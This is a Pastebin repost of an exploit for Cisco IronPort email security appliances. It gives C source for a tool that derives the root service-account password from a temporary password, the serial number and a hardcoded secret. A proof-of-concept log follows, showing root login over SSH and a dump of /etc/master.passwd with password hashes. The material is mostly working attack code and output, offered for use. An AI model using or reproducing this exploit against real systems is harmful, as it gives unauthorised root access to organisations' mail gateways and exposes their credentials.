Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #include <stdio.h>
- #include <stdlib.h>
- #include <string.h>
- #include <ctype.h>
- #include "md5.h"
- #include "getopt.h"
- #define MAX_BUFFER 128
- #define SECRET_PASS "woofwoof"
- void usage(char *name);
- void to_lower(char *str);
- void fuzz_string(char *str);
- int main(int argc, char *argv[]) {
- if (argc < 2) { usage(argv[0]); }
- int opt;
- int index;
- char *temp_pass = { 0 };
- char *serial_no = { 0 };
- char *secret_pass = SECRET_PASS;
- char service[MAX_BUFFER] = { 0 };
- unsigned char digest[16] = { 0 };
- while ((opt = getopt(argc, argv, "p:s:h")) != -1) {
- switch (opt)
- {
- case 'p':
- temp_pass = optarg;
- break;
- case 's':
- serial_no = optarg;
- break;
- case 'h': usage(argv[0]);
- break;
- default:
- printf_s("Wrong Argument: %s\n", argv[1]);
- break;
- }
- }
- for (index = optind; index < argc; index++) {
- usage(argv[0]);
- exit(0);
- }
- if (temp_pass == NULL || serial_no == NULL) {
- usage(argv[0]);
- exit(0);
- }
- if ((strlen(temp_pass) <= sizeof(service)) && (strlen(serial_no) <= sizeof(service))) {
- to_lower(serial_no);
- fuzz_string(temp_pass);
- strcpy_s(service, sizeof(service), temp_pass);
- strcat_s(service, sizeof(service), serial_no);
- strcat_s(service, sizeof(service), secret_pass);
- MD5_CTX context;
- MD5_Init(&context);
- MD5_Update(&context, service, strlen(service));
- MD5_Final(digest, &context);
- printf_s("Service Password: ");
- for (int i = 0; i < sizeof(digest)-12; i++)
- printf("%02x", digest[i]);
- }
- return 0;
- }
- void fuzz_string(char *str) {
- while (*str){
- switch (*str) {
- case '1': *str = 'i'; break;
- case '0': *str = 'o'; break;
- case '_': *str = '-'; break;
- }
- str++;
- }
- }
- void to_lower(char *str) {
- while (*str) {
- if (*str >= 'A' && *str <= 'Z') {
- *str += 0x20;
- }
- str++;
- }
- }
- void usage(char *name) {
- printf_s("\nUsage: %s -p password -s serial\n", name);
- printf_s(" -p <password> | Cisco Service Temp Password\n");
- printf_s(" -s <serial> | Cisco Serial Number\n");
- printf_s(" -h | This Help Menu\n");
- printf_s("\n Example: %s -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019F508A4\n", name);
- exit(0);
- }
- PoC:
- Enable Service Account
- ----------------------
- root@kali:~# ssh -lenablediag 192.168.0.158
- Password:
- Last login: Sat Jan 24 15:47:07 2015 from 192.168.0.163
- Copyright (c) 2001-2013, Cisco Systems, Inc.
- AsyncOS 8.5.5 for Cisco C100V build 280
- Welcome to the Cisco C100V Email Security Virtual Appliance
- Available Commands:
- help -- View this text.
- quit -- Log out.
- service -- Enable or disable access to the service system.
- network -- Perform emergency configuration of the diagnostic network interface.
- clearnet -- Resets configuration of the diagnostic network interface.
- ssh -- Configure emergency SSH daemon on the diagnostic network interface.
- clearssh -- Stop emergency SSH daemon on the diagnostic network interface.
- tunnel -- Start up tech support tunnel to IronPort.
- print -- Print status of the diagnostic network interface.
- reboot -- Reboot the appliance.
- S/N 564DDFABBD0AD5F7A2E5-2C6019F508A4
- Service Access currently disabled.
- ironport.example.com> service
- Service Access is currently disabled. Enabling this system will allow an
- IronPort Customer Support representative to remotely access your system
- to assist you in solving your technical issues. Are you sure you want
- to do this? [Y/N]> Y
- Enter a temporary password for customer support to use. This password may
- not be the same as your admin password. This password will not be able
- to be used to directly access your system.
- []> cisco123
- Service access has been ENABLED. Please provide your temporary password
- to your IronPort Customer Support representative.
- S/N 564DDFABBD0AD5F7A2E5-2C6019F508A4
- Service Access currently ENABLED (0 current service logins)
- ironport.example.com>
- Generate Service Account Password
- ---------------------------------
- Y:\Vulnerabilities\cisco\ironport>woofwoof.exe
- Usage: woofwoof.exe -p password -s serial
- -p <password> | Cisco Service Temp Password
- -s <serial> | Cisco Serial Number
- -h | This Help Menu
- Example: woofwoof.exe -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019F508A4
- Y:\Vulnerabilities\cisco\ironport>woofwoof.exe -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019
- F508A4
- Service Password: b213c9a4
- Login to the appliance as Service account with root privileges
- --------------------------------------------------------------
- root@kali:~# ssh -lservice 192.168.0.158
- Password:
- Last login: Wed Dec 17 21:15:24 2014 from 192.168.0.10
- Copyright (c) 2001-2013, Cisco Systems, Inc.
- AsyncOS 8.5.5 for Cisco C100V build 280
- Welcome to the Cisco C100V Email Security Virtual Appliance
- # uname -a
- FreeBSD ironport.example.com 8.2-RELEASE FreeBSD 8.2-RELEASE #0: Fri Mar 14 08:04:05 PDT 2014
- auto-build@vm30esa0109.ibeng:/usr/build/iproot/freebsd/mods/src/sys/amd64/compile/MESSAGING_GATEWAY.amd64 amd64
- # cat /etc/master.passwd
- # $Header: //prod/phoebe-8-5-5-br/sam/freebsd/install/dist/etc/master.passwd#1 $
- root:*:0:0::0:0:Mr &:/root:/sbin/nologin
- service:$1$bYeV53ke$Q7hVZA5heeb4fC1DN9dsK/:0:0::0:0:Mr &:/root:/bin/sh
- enablediag:$1$VvOyFxKd$OF2Cs/W0ZTWuGTtMvT5zc/:999:999::0:0:Administrator support access
- control:/root:/data/bin/enablediag.sh
- adminpassword:$1$aDeitl0/$BlmzKUSeRXoc4kcuGzuSP/:0:1000::0:0:Administrator Password
- Tool:/data/home/admin:/data/bin/adminpassword.sh
- daemon:*:1:1::0:0:Owner of many system processes:/root:/sbin/nologin
- operator:*:2:5::0:0:System &:/:/sbin/nologin
- bin:*:3:7::0:0:Binaries Commands and Source,,,:/:/sbin/nologin
- tty:*:4:65533::0:0:Tty Sandbox:/:/sbin/nologin
- kmem:*:5:65533::0:0:KMem Sandbox:/:/sbin/nologin
- man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/sbin/nologin
- sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/sbin/nologin
- nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/sbin/nologin
- support:$1$FgFVb064$SmsZv/ez7Pf4wJLp5830s/:666:666::0:0:Mr &:/root:/sbin/nologin
- admin:$1$VvOyFxKd$OF2Cs/W0ZTWuGTtMvT5zc/:1000:1000::0:0:Administrator:/data/home/admin:/data/bin/cli.sh
- clustercomm:*:900:1005::0:0:Cluster Communication User:/data/home/clustercomm:/data/bin/command_proxy.sh
- smaduser:*:901:1007::0:0:Smad User:/data/home/smaduser:/data/bin/cli.sh
- spamd:*:783:1006::0:0:CASE User:/usr/case:/sbin/nologin
- pgsql:*:70:70::0:0:PostgreSQL pseudo-user:/usr/local/pgsql:/bin/sh
- ldap:*:389:389::0:0:OpenLDAP Server:/nonexistent:/sbin/nologin
- */
- # 0day.today [2018-04-14] #
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement